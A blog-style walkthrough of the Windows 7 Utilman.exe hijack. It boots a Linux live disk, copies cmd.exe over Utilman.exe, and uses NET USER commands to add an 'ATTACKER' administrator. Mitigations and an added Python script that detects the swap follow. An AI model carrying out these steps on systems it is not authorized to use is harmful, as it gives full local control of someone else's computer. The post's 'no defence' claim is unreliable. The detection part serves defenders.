Disclaimer: First of all I would like to let you know that I cannot be held responsible for any misuse of the information stated here. This blog exists only to let people know about the vulnerabilities, bugs and security vectors that are out there, since the companies that possess them do not even talk about them, so I bring them to light to make people more aware of the issue. Since the first 10 amendments (the Bill of Rights) give me the right to share information, here it is, because knowledge is power.
Nowadays, someone does not need to know much about the inner workings of Windows 7 security to take total control of it. This procedure is so simple that even a 10 year old can do it, needing ONLY a Linux live CD or DVD (or even a flash drive) to boot from. I like to call this procedure application hijacking, and there is no fix or defence against it on the Windows side. It can be diminished by setting a BIOS password, but even that can be bypassed by taking out the CMOS battery, which resets the BIOS password completely. That would be very noticeable if the owner of the computer checks the BIOS and realizes there is no password prompt, but by then it might be too late...
So here it is. First, we can see the Windows login is totally normal. This attack relies on the "Ease of Access" button, which helps people with disabilities use the operating system by providing a magnifier, an on-screen keyboard, speech recognition, etc. As the name states, "Ease of Access" now becomes "Ease of Penetration Access" :)
With this said, we boot into the BIOS setup, where we first need to change the boot order so the machine boots from CD-ROM, DVD-ROM or flash drive (whichever you prefer).
After this, we boot into Linux. For this lab, we will use one of my favourite distros: Kali Linux (aka Backtrack 6).
We wait until all files, hardware, kernel and services are loaded and we are presented with the desktop. You can do this from the CLI or the GUI; it really does not matter as long as you use these commands:
First we create a directory where we will mount the physical hard drive (where Windows 7 resides). Note that /dev/sda# will be your hard drive if you are using a SATA drive and /dev/hda# if you are using an IDE hard drive.
# mount /dev/sda1 /media/harddrive/
Now we will proceed to the hijacking, but first we make a backup of the "Ease of Access" executable, which is called Utilman.exe.
# mv Utilman.exe Utilman.Backup.exe
Now let's do the hijacking by putting cmd.exe in its place :)
# cp cmd.exe Utilman.exe
Reboot the system:
Now it is time to reboot the system: take out the CD, DVD or flash drive, change the BIOS boot order back to normal and let Windows start.
After Windows starts, click the "Ease of (Penetration) Access" button once more and "Voilà!", a CMD.exe window with ADMINISTRATOR privileges appears :)
Now, let's give ourselves administrator access by creating the user "Attacker":
NET USER ATTACKER /ADD
NET LOCALGROUP ADMINISTRATORS ATTACKER /ADD
Let's verify that the user Attacker is an administrator:
NET USER ATTACKER
You can also verify it by listing who is in the Administrators group:
NET LOCALGROUP ADMINISTRATORS
Now it is time to log in with our newly created super-user account:
Let's verify that the account we just logged in with has administrator rights:
The lesson of this lab is not to teach anybody to break rules but to make users aware of the dangers that come from big profit-glutton corporations like Microsoft. You can help secure your computer from this attack by 1) disabling CD-ROM/DVD-ROM and USB external storage, 2) setting a BIOS password and 3) removing CD-ROM/DVD-ROM drives or buying a computer with no USB connections :-D
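As an added example (not from the original post), here is the check a defender can run to catch exactly this swap after the fact: it audits the accessibility executables in System32 for a binary that is byte-identical to a shell, or for a leftover backup copy such as the Utilman.Backup.exe the steps above leave behind. The demo directory and its placeholder bytes are constructed; point audit_system32 at a real System32, either on the live machine or on a volume mounted read-only from rescue media, to use it.

```python
import hashlib
import tempfile
from pathlib import Path

# Accessibility helpers Windows launches from the logon screen before anyone authenticates.
ACCESSIBILITY_BINARIES = ["Utilman.exe", "sethc.exe", "osk.exe", "Magnify.exe",
                          "Narrator.exe", "DisplaySwitch.exe", "AtBroker.exe"]
SHELL_BINARIES = ["cmd.exe", "powershell.exe"]  # what typically gets copied over them

def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def audit_system32(system32: Path) -> list:
    """One finding per suspicious accessibility binary; works live or on a mounted volume.
    Check 1: the binary is byte-identical to a shell in the same directory.
    Check 2: a leftover copy such as Utilman.Backup.exe sits beside it (the mv step above)."""
    shell_hashes = {}                        # sha256 -> shell name
    for name in SHELL_BINARIES:
        p = system32 / name
        if p.is_file():
            shell_hashes[sha256_of(p)] = name
    findings = []
    for name in ACCESSIBILITY_BINARIES:
        target = system32 / name
        if not target.is_file():
            continue
        digest = sha256_of(target)
        if digest in shell_hashes:
            findings.append(f"{name} is byte-identical to {shell_hashes[digest]}")
        prefix = target.stem.lower() + "."   # e.g. "utilman." matches Utilman.Backup.exe
        for other in system32.iterdir():
            low = other.name.lower()
            if other.is_file() and low != name.lower() and low.startswith(prefix):
                findings.append(f"{name}: unexpected sibling file {other.name}")
    return findings

def build_demo() -> Path:
    """Constructed stand-in for System32 in the tampered state (placeholder bytes, not real PEs)."""
    d = Path(tempfile.mkdtemp())
    (d / "cmd.exe").write_bytes(b"MZ placeholder cmd")
    (d / "Utilman.Backup.exe").write_bytes(b"MZ placeholder utilman")  # the moved original
    (d / "Utilman.exe").write_bytes(b"MZ placeholder cmd")           # now a copy of cmd.exe
    return d

if __name__ == "__main__":
    print("\n".join(audit_system32(build_demo())) or "no findings")
```

The check only detects the swap after it has happened; preventing it means denying write access to the system volume from outside the running OS (for instance with full-disk encryption), which is the gap the three boot-order mitigations above try to close from the firmware side.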
Big cheers to RS, who made me aware of this security vector.
I hope you enjoyed it!